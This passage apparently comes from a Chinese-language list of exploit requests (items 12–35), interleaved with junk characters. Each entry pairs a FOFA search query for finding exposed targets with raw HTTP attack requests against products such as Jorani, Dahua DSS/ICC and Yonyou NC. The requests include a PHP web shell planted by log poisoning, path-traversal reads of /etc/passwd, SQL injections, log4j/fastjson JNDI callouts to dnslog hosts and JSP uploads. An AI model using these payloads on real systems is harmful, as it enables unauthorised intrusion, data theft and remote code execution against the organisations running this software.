Pragma: no-cache$ ^5 u( b" x' \6 L4 i; @
Cache-Control: no-cache
$ r" _* @6 X" w0 c6 {+ v$ o* ?% AUpgrade-Insecure-Requests: 1
: }" w* ?# X$ x% |0 Q; u, TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* p& b+ t8 Z6 ~! {" _: OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ }0 b9 a7 A* Z5 U
Accept-Encoding: gzip, deflate
, m, J1 o- g+ B7 qAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
& G1 n2 ^3 _4 L5 X: Z2 X% K" pConnection: close- c) |6 W* E. `
6 C3 C [. m7 Q* \9 b# I2 t
, F- l8 C& p u12. Jorani < 1.0.2 远程命令执行
0 @& ~3 h/ y0 ~4 o2 A" Y' b+ cFOFA:title="Jorani"
/ p$ J; p( y. A: ~. c第一步先拿到cookie
& t: s4 y9 a B4 n4 V* a0 Y: xGET /session/login HTTP/1.1+ m# v$ @1 L3 P, j5 W
Host: 192.168.190.303 _, P" l) ?- Y. Z0 A4 q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.363 D& ]; } ^ L! M: }" y0 N. s; P' J
Connection: close
$ K# | k" O' t4 w5 K) J3 j2 _8 wAccept-Encoding: gzip! w0 q) E0 c7 U# ~& N! X
5 ]( L, o& M/ b
. X8 P* E, j. K% j/ m响应中csrf_cookie_jorani用于后续请求$ O, I$ y8 K) k
HTTP/1.1 200 OK
+ B8 l1 z' Z0 ^) r, ~. p5 GConnection: close) ?1 a+ {7 m' F( [! _
Cache-Control: no-store, no-cache, must-revalidate
/ v) P5 Z y/ F V' A# y, h5 CContent-Type: text/html; charset=UTF-8
1 x- A& U1 H5 u2 _. VDate: Tue, 24 Oct 2023 09:34:28 GMT
3 h( P. T( M+ F Q2 yExpires: Thu, 19 Nov 1981 08:52:00 GMT
{. E& v9 x6 L+ S% |5 Q) v% \Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
. j- _$ p P4 rPragma: no-cache
- Y) H9 n+ I' F" ~. Q; R0 n7 yServer: Apache/2.4.54 (Debian)
# w8 }' K+ G" W$ p- x" i! jSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/7 ?- Q8 C) Q" S
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly r! L+ \: x7 v/ B
Vary: Accept-Encoding( E+ K% `) ~! c" Y* L
" {% y& q; l/ A$ {3 x) L$ ]
3 u6 Y$ s6 o$ k% cPOST请求,执行函数并进行base64编码/ H4 U% L$ s, \- f- t
POST /session/login HTTP/1.1# Z) A& H4 o1 r: \6 G! ?9 i
Host: 192.168.190.30- u5 `$ U2 y5 r# Q7 ?0 K% F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36' z2 n& I' F0 `+ @
Connection: close* x$ }% c ~* m+ e+ S7 ?
Content-Length: 252
! k, e2 k) g# ~' ]1 F1 LContent-Type: application/x-www-form-urlencoded0 b* H+ j" {2 t5 R+ v4 V
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
! i, b* |; _0 @0 j$ J0 XAccept-Encoding: gzip, I* @, Y& A2 @- q' ?, N4 ]! S
6 b; K+ ?2 n2 H& L) j7 |+ Q+ L9 S
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor. B7 ^' r3 ]8 u" T# ^5 [/ O( \' C
# h6 v8 e- A! @
3 P* X) _. J* p+ S
* A1 b# s% L/ [2 e% E; l+ x1 u. i向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串7 O" ^* e( X: L. @) Y
GET /pages/view/log-2023-10-24 HTTP/1.1& G( i; I; T9 x. Y0 H
Host: 192.168.190.302 T }0 c2 Y; Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ d8 V3 b) N# m$ t1 e2 VConnection: close
7 E$ n7 V6 k, g# L& X' hCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r2 _2 u' x# B1 ]8 H! x2 o" L
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=9 O; A, k8 M4 u! ^0 x$ j
X-REQUESTED-WITH: XMLHttpRequest
% I# Z* ^0 w0 y/ a3 nAccept-Encoding: gzip
+ x* e8 J9 B+ {. u
! _! ~* e" a9 N) |& i7 w' h0 d' t4 e1 J
13. 红帆iOffice ioFileDown任意文件读取
8 U6 d( s# `7 O K) P0 c& AFOFA:app="红帆-ioffice"
2 [2 U4 ? M/ `; h1 x$ @9 \GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
8 {9 a4 p6 ~+ `* BHost: x.x.x.x
4 L+ T' I# W" T( U P0 kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( n0 r5 { c. g" R* m. ^) ]; M5 r
Connection: close* W& y+ k0 K3 R# M. I0 T
Accept: */*
7 ?% e/ c8 n. N5 NAccept-Encoding: gzip/ J9 K0 {5 n- ?9 U
. ^+ q8 t' k3 ^& }# z
4 h) r( V+ B7 Y" S
14. 华夏ERP(jshERP)敏感信息泄露2 v/ w9 X7 P3 l0 l: t
FOFA:body="jshERP-boot"" b. d0 y) V- a2 U: ^5 L
泄露内容包括用户名密码
4 l3 I& Q6 f+ ]9 |GET /jshERP-boot/user/getAllList;.ico HTTP/1.1: Z) L H0 w& z2 l S- g' u6 `
Host: x.x.x.x* b" N* y6 `0 X1 g9 E; m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.366 Y0 W- u" ^" J# ]6 j% l
Connection: close, v: L# B# [# T& l
Accept: */*
& ^4 P U# m' E5 _# P& qAccept-Language: en
- F0 e( _1 P% h- c1 x' XAccept-Encoding: gzip
# Z- `9 l* t, ^- m& d( R" r" F
$ a+ S* y, U+ G# |9 K# S0 }
$ @; J& V% i( L0 I- a n5 G9 N* y6 R15. 华夏ERP getAllList信息泄露- M: R* H+ A5 E8 _: T7 T
CVE-2024-0490
. I4 ?, [) F# j8 d4 kFOFA:body="jshERP-boot"- c+ s; ?+ m" O
泄露内容包括用户名密码1 ^. t# @8 L6 v# |* f
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1. r: g0 s8 l: c
Host: 192.168.40.130:100# u p! b [0 ^) ~( N% c$ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
7 k1 X/ E3 \ WConnection: close
" \% D; b. M; b; y) P9 XAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8: q3 Q0 }7 n4 X) A9 q9 o8 |
Accept-Language: en# f/ o$ b. Y' F- P+ x; Y" s
sec-ch-ua-platform: Windows0 {( l" C5 ~7 C% I: M9 U9 _" F
Accept-Encoding: gzip
. D1 `, `. v* D3 k; l# |% j1 |
5 N Y7 \7 L7 }# c% q; Z8 R) z# y. R8 n' z* Q% y2 o" j4 {
16. 红帆HFOffice医微云SQL注入, w! |& _# ~' L' y4 E; D
FOFA:title="HFOffice"3 ?& @7 G. S9 s% h$ A; A( f; h8 x
poc中调用函数计算1234的md5值9 }7 i {- b8 {4 N2 h$ ?2 ~, c( M7 u
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
- T% Q' z0 t6 a9 W% GHost: x.x.x.x% c/ Y: V `; Q$ t1 j- j
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36. A! g: b2 I9 g6 [' e4 v
Connection: close% F7 E, m1 {# }( x- V' T" u# i
Accept: */*
1 Y# ?% ~0 o+ Z5 @- Q4 F' {& KAccept-Language: en
3 x; B: W; P, p# V- o4 RAccept-Encoding: gzip
9 W' }5 ]8 P+ L; O& T; F" \3 \& h( ^; \
- e: N& i( @3 I4 U- ?17. 大华 DSS itcBulletin SQL 注入
4 [; f1 [) W% [+ d- w% J: EFOFA:app="dahua-DSS"8 W; D; {3 Z# [3 D/ j w$ d7 w
POST /portal/services/itcBulletin?wsdl HTTP/1.1
! k2 M# I/ m( ~$ t% y" iHost: x.x.x.x
* B" s$ s2 I9 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& e/ N* {' \9 k( {( p, J9 t
Connection: close: k& [3 n5 o& ` L& U
Content-Length: 345
n8 t3 m# \4 b$ G; R6 I, OAccept-Encoding: gzip3 x3 W; X9 ]; x8 Z6 C
% e- H: e6 O+ e z* m) h. `<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>& C+ |" w: D* ~6 _0 ~, M
<s11:Body>$ K+ X! c" e" L) d ~
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>- j, X2 L* J; u, d& D0 U
<netMarkings>
: @; M# k7 b+ S5 R& Z5 M; r (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
0 D' H' E ~. a6 U </netMarkings>
. ?: J& d: e1 d! }* A+ ]$ w" b* y </ns1:deleteBulletin>1 o, ~& |8 M* U7 M+ ~6 z
</s11:Body>
# A( m5 n+ X* t6 w1 d</s11:Envelope>+ q' S, b9 X9 S" G+ w5 ~- t$ i
- S7 P' k: ^ |+ v: n& q$ @$ m3 Z/ X: o
$ Q' v0 w: Q* P, T$ C18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
' N2 }/ N6 e4 n( Q+ x0 }+ cFOFA:app="dahua-DSS"# I4 O/ G! @1 @* s
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1, F$ m; o% h3 g7 [0 D2 _+ a8 x
Host: your-ip: A R! `/ M3 {! T& {$ D, g" k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ B& B$ Q6 |# E7 x" Y; @! b! Y' [Accept-Encoding: gzip, deflate& z* t/ \9 b. `) B7 D' U; }
Accept: */*
J% X" ?2 B3 Q% h9 }Connection: keep-alive
. s; f9 ?, c" m! q( x; g8 h! m% M6 U' H
1 Q2 K! F, f) ~* C/ _# {9 @: `/ Q$ A$ m5 n0 h
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 A% M1 V& j- U( z- HFOFA:app="dahua-DSS"; R( i* P7 u' v# k6 c# {& |. ~& D8 T
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.10 o& }) q4 Y/ M" T
Host:4 p# A6 z; c5 ? u0 W& ?( l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 c5 B. C8 c. f7 e3 eAccept-Encoding: gzip, deflate- F+ U+ s+ y; m& t) i
Accept: */*
r9 @" Z! Y9 R& u# eConnection: keep-alive: Y. t2 [. V @, V9 q/ c& b
N. B9 P0 |6 b" \$ G+ p. w; d* C9 O$ j! D: B1 v" |$ U
20. 大华ICC智能物联综合管理平台任意文件读取3 ]2 R5 J/ K% [
FOFA:body="*客户端会小于800*"* q/ g- t$ f4 O" C* Q
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1( [6 s; k9 J/ T
Host: x.x.x.x
6 W3 q. v" }8 {% o I! AUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( ~: W: \2 Z0 s
Connection: close
$ h/ l& i! N( N+ r- JAccept: */*
+ D1 r6 Z2 X1 ]Accept-Language: en. j. d* F( s6 g. x2 H, x
Accept-Encoding: gzip
1 j; f$ U" H6 W2 G/ X) X v( ~. }/ x3 t0 i6 }- Z: \" U1 y4 a
+ T' A/ z8 h+ P8 [8 b2 h9 b21. 大华ICC智能物联综合管理平台random远程代码执行
5 v! z" `$ V8 Q8 O% g0 {2 oFOFA:icon_hash="-1935899595"
% ?7 ]' D3 Z6 e% \7 x( mPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ O/ y" m/ v$ m l. G- R: q
Host: x.x.x.x
, o( p4 @9 W( z0 @( ~: [% `- mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' }6 P$ S0 D1 P% o+ F9 aContent-Length: 161
9 _& J( {; q5 { v: ^( nAccept-Encoding: gzip
5 W2 O. [7 m2 `! l7 G3 cConnection: close! X3 f" T) c2 B3 ^
Content-Type: application/json;charset=utf-8
% K* w4 Y3 ~ A$ g; ?7 S" _& \5 \" C/ F
{
0 K( {0 B8 z0 \, Y8 v"a":{+ c% I( F- ?. k
"@type":"com.alibaba.fastjson.JSONObject",( d; x; A: t1 P# I# v! `5 ~
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
5 g! N- M _% f$ d }""
2 E) P1 l! n: w}4 j$ h& c6 c6 w# e& {2 I
2 N5 I/ C( [; Y, n
" o0 y; S' t& n, C+ a" {0 D22. 大华ICC智能物联综合管理平台 log4j远程代码执行
8 q2 I) t) K1 n9 JFOFA:icon_hash="-1935899595"
- q: s3 ]; u) l3 G" a6 ^7 XPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1! y, A4 i2 E3 u3 r' O
Host: your-ip
3 Y3 }% S; \$ ^& TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& z G3 u- h3 `. @
Content-Type: application/json;charset=utf-85 n9 j% T5 B: p* ], c4 t, U2 S
5 |+ n1 D; P# a% e{
5 a/ G3 m6 z0 e; Q"loginName":"${jndi:ldap://dnslog}"* H; Q# x5 m! ^
}
# T0 s4 a' X' a" y) O } s! _/ C2 w, A/ q' M" Y$ Z& z) f( ?6 x
5 D! M. j/ G8 i5 T$ q
% E3 l5 a% _- A3 x/ G# Z2 ~+ s23. 大华ICC智能物联综合管理平台 fastjson远程代码执行& e" o. b5 \3 O* T) J: L
FOFA:icon_hash="-1935899595"+ ?2 k' {0 L; U0 v& U# O9 m
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1" r5 P3 ^. K0 y2 D/ N" s
Host: your-ip8 l( z% m0 X2 Z4 ]+ {( J7 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 O' ]1 K3 b. ]8 Z6 l
Content-Type: application/json;charset=utf-8
; E0 w4 c7 Y% r9 RAccept-Encoding: gzip
; N# C3 u$ E" Y* j: ^Connection: close
" ~# c0 S5 x. r4 n) \* a# t9 p
1 ^& a, ]/ T8 O+ O' b{6 x4 }- N. @4 a' j( M" a
"a":{
& Q3 E& P. Q/ s, g: K) b "@type":"com.alibaba.fastjson.JSONObject",
" k$ I( v L2 B- l {"@type":"java.net.URL","val":"http://DNSLOG"}
; k, T5 o7 e* d) _ }"", Z/ b" N9 x- {) X" a
}% L' N$ x# k5 u$ I7 o$ E9 Z
! o S3 n2 I0 K
/ V, h1 E# @& ?( e$ R* n0 Z4 B! P24. 用友NC 6.5 accept.jsp任意文件上传
& r- i: U$ H/ Q: ZFOFA:icon_hash="1085941792"7 S$ p9 s" R0 M" `
POST /aim/equipmap/accept.jsp HTTP/1.18 w% S- t9 F8 b! X1 j. F
Host: x.x.x.x, t" J2 L. P* k- ?0 q; o" U
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! u1 u# y! ~5 E! [& s+ k, VConnection: close% W: F, z. \7 q# `3 C4 [
Content-Length: 449 i0 A4 z ^" x) u
Accept: */*
, u$ p6 T: F( J# w! B# yAccept-Encoding: gzip6 D9 S+ {4 m/ `7 \' Q) _
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. U6 u/ {6 B0 i% A1 x: W$ d. |* C6 s( B: {/ U8 L# y$ _5 }
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) {6 t6 b4 [% z' [& L" M0 }
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"( ~5 i2 M; Y8 g) Z
Content-Type: text/plain
" K3 s& d5 Y6 O. U ]
0 E0 f1 K( P! ?* E8 T0 ]0 d<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
2 f0 e. W' m2 D1 ~. l% _-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! p' _: M: [. k9 O* d4 tContent-Disposition: form-data; name="fname"
/ x8 n Y; `8 s- Y0 i% {, Z1 j8 X, d( U/ t
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp; r( K/ D$ }; X i% T
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--6 e5 n/ m+ |) _0 X
( G/ G) X5 w; h, q+ m
7 D. V- N: {/ T H/ g& ]9 B' Z25. 用友NC registerServlet JNDI 远程代码执行5 K9 h W& g6 D: w
FOFA:app="用友-UFIDA-NC"+ \, ?- o3 [7 r) g& _* n* {; \
POST /portal/registerServlet HTTP/1.11 E* d# y. T" @: D% [
Host: your-ip
; k- ~ j8 s/ h; h$ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.04 ?( `( L& F) D! Q! O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
* a! _8 l/ \" L7 }Accept-Encoding: gzip, deflate; r! _- ~" a+ L" j2 o* f6 f j" x7 U
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6, Z* H% M" R/ z' ^ D2 D' Z
Content-Type: application/x-www-form-urlencoded
/ s9 A( M9 J, ?$ w& a
% U' H/ J) Z ?7 |0 @ Ntype=1&dsname=ldap://dnslog3 o* H% y+ r( T' e0 ]8 O+ D
# W+ q! M1 ]& n3 V: [& H9 K' v* _( E/ [! o# Z
{/ I) Q, Q7 p' t, n26. 用友NC linkVoucher SQL注入3 u' Y# z, J t
FOFA:app="用友-UFIDA-NC"6 n( r% P7 ?7 n% u, i* t: R
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% |8 w0 F4 \! ]% n& RHost: your-ip
; N$ m+ [: _0 P7 S( JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 c, P5 B2 |& x3 `% z7 a/ V
Content-Type: application/x-www-form-urlencoded
* f7 \, h' ?! \; e+ I0 y( T: C4 nAccept-Encoding: gzip, deflate) d( ?* M% m( W& d9 V" N
Accept: */*
( ]. S7 a5 \+ F4 J7 zConnection: keep-alive7 m ]5 C _ j
0 ~, b9 Q3 a! h* u8 ?( r" N8 \/ w4 f' A. O4 h5 U; {
27. 用友 NC showcontent SQL注入 B! |( {) ]% j# ^
FOFA:icon_hash="1085941792"5 \8 Y2 t6 S0 `% \
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1- P" J( ~: H, E( l; S
Host: your-ip6 w( |$ u4 q7 A) Q3 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 l$ t0 ]" B9 F3 n" f3 IAccept-Encoding: identity, w! u# ?' r( Z0 L) D* F
Connection: close# g. }6 V4 n/ r2 O$ [! J. p
Content-Type: text/xml; charset=utf-8
# z+ d' n, P$ C4 D0 }: m! L+ ]# j/ J Z. d5 X7 z
* m5 r, H9 Y7 W- a' S$ O28. 用友NC grouptemplet 任意文件上传
7 T3 l# z( C3 l/ UFOFA:icon_hash="1085941792"7 t. W9 n: h" S+ Z
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.15 g( K$ N% w) f8 L( o
Host: x.x.x.x8 q0 _! p1 N. i) C; ]* ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 [) N; b% ]6 v/ k* BConnection: close
" W8 f q* o6 J6 w1 G' [Content-Length: 268
% a$ g \( D- s9 _3 l8 YContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
# p6 i9 ]( `, }" zAccept-Encoding: gzip {1 e5 ^( Q$ M2 [
- X9 I) s2 v/ k) l6 G------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk( Z; A9 `+ t$ u: L$ p2 W
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
. O) W% c" y! K r5 q5 kContent-Type: application/octet-stream0 K( w2 x& a2 q' y1 B& Z
3 A( |0 W) t/ H0 l<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
% L" G8 a! B4 s------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--& ]+ o/ `* h7 ~1 b- V p* C
$ x' r5 A% }9 m* d b" s Z a% X+ Y Q* v' j/ h) y: E5 e
/uapim/static/pages/nc/head.jsp
# n6 L3 A3 F5 b+ T4 S- D' n* r( @3 \- t# [" f
29. 用友NC down/bill SQL注入
9 m$ Q8 b1 m3 B' m6 ^2 `0 J" EFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
( A- d; |. P1 M1 g/ dGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
0 N, Z3 s3 ~- L4 u2 P1 [7 ]; fHost: your-ip
# Q+ \7 f. n# {6 c1 W0 K. J: CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* S$ P% k6 c" W: `Content-Type: application/x-www-form-urlencoded
+ z+ N* U) M F( ^6 ?2 R- @& EAccept-Encoding: gzip, deflate
- b8 t" @/ A: p. M- R% P$ QAccept: */*
! q4 s- T9 |& u# x( }8 T2 NConnection: keep-alive( }! M6 [. W& R/ V" Z! F2 y" }6 c
" }% _4 d: K+ L+ r) f h1 ^! C$ H4 p5 F/ y5 [% o# m" C
30. 用友NC importPml SQL注入
2 [8 z. f0 c( M! m- E9 _4 TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' V! L' `* R; t
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
1 y, i5 A) `+ L' Z4 q" G* HHost: your-ip
3 n- [' Q& l9 m& Z6 n! |. D9 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V. i) h6 p8 i. R9 `/ W. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36$ [( [6 X* @- r* _/ O( ^% S
Connection: close
) G; v- J+ b6 M3 F0 x" }# c
o5 p- {& q4 f' c+ i------WebKitFormBoundaryH970hbttBhoCyj9V* g Y0 s& r2 W+ |' p
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
, B: Z' y6 x: e. c% qContent-Type: image/jpeg3 S: } l3 v. o+ J
------WebKitFormBoundaryH970hbttBhoCyj9V--
/ f# |0 M) b a x
8 z7 Y# i' r1 [1 J9 R* X) J0 Y# t, j$ H# i) o
31. 用友NC runStateServlet SQL注入7 @# I$ d8 N3 ^) G7 f
version<=6.5, a L" P( x0 m. [) x$ L
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"; S9 E3 @* V" N! v) y
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1! K" \9 ^ j" I& ^0 E% O
Host: host
9 G* g, k1 i$ d* H N0 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! c" ~: s) y+ z) C/ F+ I( k4 QContent-Type: application/x-www-form-urlencoded
" j& u% d' ?# q) x3 b- m5 @ D" i" c
2 b0 w# m' l0 }9 A6 M9 o! E; q32. 用友NC complainbilldetail SQL注入: v5 v- n. a3 t P C) f, e
version= NC633、NC65
/ \1 u! `$ o3 ~( c: ZFOFA:app="用友-UFIDA-NC"7 D" _( g2 U2 S& @% v
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.13 r2 D" w* q& w' ?( E
Host: your-ip$ P2 z+ o( l) ]' ^$ {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& r) q( {9 g( C) qContent-Type: application/x-www-form-urlencoded, D D! o: X! I6 J" o2 W
Accept-Encoding: gzip, deflate
- o6 e# U4 p- d/ [( m4 Z$ rAccept: */*
9 w( L" u: s) X/ n3 }& zConnection: keep-alive! R% `- V& a0 t( ]7 b. a! c. I' l5 K
* b' ^* {% O8 o: K- ?
& e) @9 h+ ~- b1 n, c+ I33. 用友NC downTax/download SQL注入. C* `* f( G! u+ M, K( A" ~' l
version:NC6.5FOFA:app="用友-UFIDA-NC") i9 U* B% | t5 s i) x1 C/ R
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. c% U! Z8 K3 sHost: your-ip2 T* ~2 E/ Z) }& r% z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 }( N6 o" h' U5 q0 `! U" ZContent-Type: application/x-www-form-urlencoded5 t2 C( Y, w9 B3 L u; K4 o" z
Accept-Encoding: gzip, deflate8 H, P- }$ h, j7 m0 W
Accept: */*
+ G1 Z2 p1 A1 r7 x# `. G4 |0 UConnection: keep-alive
: K9 ]4 D9 Y6 p, \6 E! C( q7 w: ~& S, `* z- b
4 \3 F3 K/ C) B" G; a% z
34. 用友NC warningDetailInfo接口SQL注入
5 b, }) q3 R9 z1 v/ S5 x3 c4 rFOFA:app="用友-UFIDA-NC"9 k! e% V! d X5 t8 F
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.11 |7 }8 ~' I+ Z& b6 q9 g0 }: h
Host: your-ip6 u, b( u1 h! B3 t/ ?2 C1 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 X' t: z6 J5 p6 R! N, @+ L% RContent-Type: application/x-www-form-urlencoded
c: Q5 i1 c1 ^2 ]Accept-Encoding: gzip, deflate* q, A; ^& w& v! g& b3 ~
Accept: */*! n( J! l/ e* R) J( b: L. D
Connection: keep-alive
8 Q# C- i: P \( g* N9 j' [/ E: l$ M9 E: ^1 Z1 o3 M
! p' j- I; K! p- h! u5 m1 Y35. 用友NC-Cloud importhttpscer任意文件上传, C; x2 C8 q+ T$ P2 Z
FOFA:app="用友-NC-Cloud"3 j' e$ y* o6 M' A6 n4 c9 R
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
& I/ I- S3 U& ?( u) H" J3 i& i& DHost: 203.25.218.166:8888
